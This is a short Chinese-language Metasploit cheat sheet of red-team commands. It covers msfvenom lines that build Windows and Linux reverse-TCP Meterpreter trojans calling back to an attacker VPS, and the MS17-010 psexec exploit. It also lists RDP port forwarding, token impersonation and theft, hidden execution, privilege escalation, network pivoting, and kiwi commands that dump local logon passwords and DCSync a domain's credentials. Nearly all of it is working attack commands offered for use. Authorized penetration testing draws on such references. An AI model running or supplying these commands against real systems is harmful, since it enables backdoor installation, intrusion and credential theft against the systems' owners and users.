Metasploit

metasploit 代理socks5

set proxies socks5:127.0.0.1:6667

window生成木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=vpsip LPORT=vpsport -f exe >beacon.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=vpsip LPORT=vpsport -f exe >beacon64.exe

linux生成木马

msfvenom -p linux/meterpreter/reverse_tcp LHOST=vpsip LPORT=vpsport -f elf > beacon.elf
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=vpsip LPORT=vpsport -f elf > beacon64.elf

加载ms17010 2003系统payload

use exploit/windows/smb/ms17_010_psexec

设置代理为true

set ReverseAllowProxy true

设置bind连接

set payload windows/shell/bind_tcp

meterpreter 利用portfwd转发端口

将目标机的3389端口转发到本地6666端口

portfwd add -l 6666 -p 3389 -r 127.0.0.1

将目标机的3389端口转发到本地6666端口删除

portfwd delete -l 6666 -p 3389 -r 127.0.0.1

Impersonating Tokens with meterpreter

use incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"
whoami

在目标机上隐藏执行

execute -H -f potato.exe

cmd进行交互

execute -H -i -f cmd.exe

屏幕截屏

screenshot

令牌窃取

steal_token 1252

权限提升

getsystem

autoroute添加路由

run autoroute –h #查看帮助
run autoroute -s 192.168.159.0/24  #添加到目标环境网络
run autoroute –p  #查看添加的路由

meterpreter cmd控制台乱码

chcp 65001

meterpreter kiwi 抓取域控dcsync

load kiwi
kiwi_cmd privilege::debug
kiwi_cmd lsadump::dcsync /domain:offensive.local /all /csv

meterpreter kiwi 抓取本机密码

load kiwi
kiwi_cmd privilege::debug
kiwi_cmd sekurlsa::logonpasswords

RedTeam And Command

Metasploit